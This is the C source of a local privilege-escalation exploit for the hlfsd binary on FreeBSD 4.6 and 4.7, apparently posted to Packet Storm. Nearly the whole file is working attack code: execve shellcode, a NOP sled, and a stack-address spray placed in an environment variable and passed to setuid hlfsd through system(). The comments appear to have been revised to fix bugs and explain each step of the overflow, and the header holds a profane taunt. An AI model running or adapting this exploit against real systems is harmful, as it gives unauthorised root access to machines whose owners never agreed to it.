Hlfsd local root exploit, tested on FreeBSD 4.6-STABLE and 4.7-RELEASE. Note that hlfsd is not installed setuid by default, so this is only exploitable on systems where an administrator has made the binary setuid root.
ec0c364ca5a80087101a5cb10e3a7355c48c4a10f37fb0d2ec5b278420d7a08a
Hi Packetstormsecurity guys.
/*
* hlfsd-xp.c
* Local root exploit for hlfsd.
* 1) FreeBSD 4.7-RELEASE
* 2) FreeBSD 4.6-STABLE
* hlfsd not suid by default, but if... g0t r00t.
* argv[1] - target index into targets[] (0 or 1); the buffer size is fixed at DEFAULT_BUFFER_SIZE and the stack offset comes from the chosen target's pad field
* Thanks to: thefate, v1pee, Billi_k1d, meff, lbyte,xaoc
* Fuckz to: S|{IF yestarday you hurt me bad, you think I'm worse than
* you are? fuck you then!
*
* r00terX, NERF gr0up. (c) 2002 <under@azerinet.com>, nerf.ru
* advisory by division7
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#define NOP 0x90
#define DEFAULT_BUFFER_SIZE 1041
/* FreeBSD/i386 execve("//bin/sh", ...) payload, 25 bytes, no NUL bytes, so it
 * survives the strlen()/putenv() path in main().  Opcode breakdown (the
 * syscall number 0x3b is execve on FreeBSD; the exact argv/envp layout built
 * by the push sequence is not re-verified here):
 */
char freebsdshellcode[] =
    "\x31\xc0"                 /* xor  %eax,%eax                                   */
    "\x50"                     /* push %eax            ; string terminator         */
    "\x68\x2f\x2f\x73\x68"     /* push $"//sh"                                     */
    "\x68\x2f\x62\x69\x6e"     /* push $"/bin"         ; "//bin/sh" now on stack   */
    "\x89\xe3"                 /* mov  %esp,%ebx       ; ebx -> path               */
    "\x50\x53\x50\x54\x53"     /* push %eax; push %ebx; push %eax; push %esp; push %ebx */
    "\xb0\x3b"                 /* mov  $0x3b,%al       ; SYS_execve                */
    "\x50"                     /* push %eax            ; fake return address       */
    "\xcd\x80";                /* int  $0x80                                       */
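/* Return the current stack pointer (the low 32 bits on x86-64), which main()
 * uses as the base for its return-address guess.
 *
 * The original body was a bare `movl %esp,%eax` with no return statement:
 * it relied on %eax happening to be the return register after the asm, which
 * is undefined behavior in C and breaks as soon as the compiler optimizes.
 * An explicit output operand makes the value well-defined; the asm is marked
 * volatile so the read is not hoisted or merged away.  x86 only, as before. */
unsigned long get_sp(void) {
    unsigned int sp;
    __asm__ __volatile__("movl %%esp, %0" : "=r"(sp));
    return sp;
}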
/* One exploit target: a label for the target list, the payload planted in the
 * EGG environment variable, and the amount subtracted from this process's
 * stack pointer (get_sp()) to guess where the payload lands in hlfsd.
 * Field order matters: targets[] initializes this struct positionally. */
struct TARGET {
char *type;      /* human-readable name, printed by list_targets() and main() */
char *shellcode; /* NUL-terminated payload; main() sizes it with strlen() */
int pad;         /* offset subtracted from get_sp(); printed as "Using offset" */
};
/* Target table, terminated by an all-NULL/zero entry so list_targets() can
 * walk it without a separate count.  Both entries share the same payload and
 * differ only in the stack offset guessed for that release. */
struct TARGET targets [] = {
    { .type = "Freebsd 4.6-STABLE -x86 shellcode",  .shellcode = freebsdshellcode, .pad = 120 },
    { .type = "Freebsd 4.7-RELEASE -x86 shellcode", .shellcode = freebsdshellcode, .pad = 0   },
    { .type = NULL,                                  .shellcode = NULL,             .pad = 0   }
};
void ussage (char *argv);
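/* Entry point.  argv[1] selects an entry of targets[]; the program then builds
 * the EGG environment variable (NOP sled, shellcode, return-address spray),
 * exports it and runs hlfsd with it as the -x argument.
 *
 * Returns 0 after hlfsd has been run, 1 on an allocation/putenv/system error;
 * a missing or invalid target goes through ussage(), which exits.
 *
 * Fixes over the original:
 *  - the target index was taken with atoi() and never range-checked, so any
 *    value outside 0..1 indexed past targets[] (NULL dereference on the
 *    terminator, out-of-bounds read beyond it);
 *  - the address-spray loop stored whole words while i < bsize, so with the
 *    1041-byte buffer it wrote 3 bytes past the allocation (and on LP64 it
 *    stepped by 4 while storing 8 bytes, writing twice the buffer);
 *  - "0x%x" was used to print a long;
 *  - $EGG was unquoted in the system() command, so any byte of the payload
 *    in IFS or a glob character would have been split/expanded by the shell.
 */
int main(int argc, char **argv) {
    char *buff;
    char *end;
    long *addr_ptr, addr;
    long parsed;
    int bsize = DEFAULT_BUFFER_SIZE;
    int ntargets;
    int target;
    int i;
    size_t sclen;

    if (argc < 2)
        ussage(argv[0]);

    /* targets[] is NULL-terminated; count it so the index can be checked. */
    for (ntargets = 0; targets[ntargets].type != NULL; ntargets++)
        ;

    parsed = strtol(argv[1], &end, 10);
    if (end == argv[1] || *end != '\0' || parsed < 0 || parsed >= ntargets) {
        fprintf(stderr, "Bad target \"%s\", expected 0..%d\n", argv[1], ntargets - 1);
        ussage(argv[0]);   /* does not return */
    }
    target = (int)parsed;

    /* One extra word: the spray loop below stores whole words while
     * i < bsize, so its last store may run up to sizeof addr - 1 bytes
     * past bsize.  Those bytes sit after the terminator and are never read. */
    if (!(buff = malloc(bsize + sizeof addr))) {
        printf("Can`t allocate memory.\n");
        exit(1);
    }

    /* The guess is measured in this process; whether hlfsd's stack lines up
     * after sh -c and the exec is what the per-target pad is tuned for. */
    addr = get_sp() - targets[target].pad;
    printf("Using target: %s\n", targets[target].type);
    printf("Using address: 0x%lx\n", addr);
    printf("Using buffer size: %d\n", bsize);
    printf("Using offset: %d\n", targets[target].pad);

    /* Fill the whole buffer with the guessed return address. */
    addr_ptr = (long *)buff;
    for (i = 0; i < bsize; i += (int)sizeof addr)
        *(addr_ptr++) = addr;

    /* Lower half becomes the NOP sled, with the shellcode centred on the
     * midpoint so it straddles sled and address spray. */
    memset(buff, NOP, bsize / 2);
    sclen = strlen(targets[target].shellcode);
    memcpy(buff + (bsize / 2 - sclen / 2), targets[target].shellcode, sclen);

    buff[bsize - 1] = '\0';
    memcpy(buff, "EGG=", 4);   /* overwrites the first 4 NOPs with the name */

    /* putenv() keeps a pointer to buff rather than copying it, so buff must
     * stay allocated and unmodified for as long as the environment is used. */
    if (putenv(buff) != 0) {
        perror("putenv");
        return 1;
    }

    /* Quoted on purpose: an unquoted $EGG would be word-split and
     * glob-expanded by sh, mangling the single argument hlfsd must receive.
     * system() is kept (rather than exec) because the target pads were
     * measured with the sh -c layout in between. */
    fflush(stdout);
    if (system("/usr/sbin/hlfsd -x \"$EGG\"") == -1) {
        perror("system");
        return 1;
    }
    return 0;
}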
/* Print every entry of targets[] to stderr as "<index>) - <name>", stopping
 * at the NULL-typed terminator entry. */
void list_targets () {
    const struct TARGET *t;

    for (t = targets; t->type != NULL; t++)
        fprintf(stderr, "%d) - %s\n", (int)(t - targets), t->type);
}
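/* Print the usage banner and the target list, then exit.
 *
 * argv: the program name (argv[0]) shown in the usage line.
 * Never returns; exits with status 1 because it is only reached on a
 * missing or invalid command line (the original exited 0).
 *
 * The original third printf had a %s conversion but no matching argument,
 * so it read a garbage pointer (undefined behavior, and a likely crash);
 * the program name is what was meant. */
void ussage (char *argv) {
    printf ("%s - hlfsd local exploit\n", argv);
    printf ("written by r00terX\n\n");
    printf ("Ussage %s <target type> \ntargets avalible:\n\n", argv);
    list_targets ();
    exit(1);
}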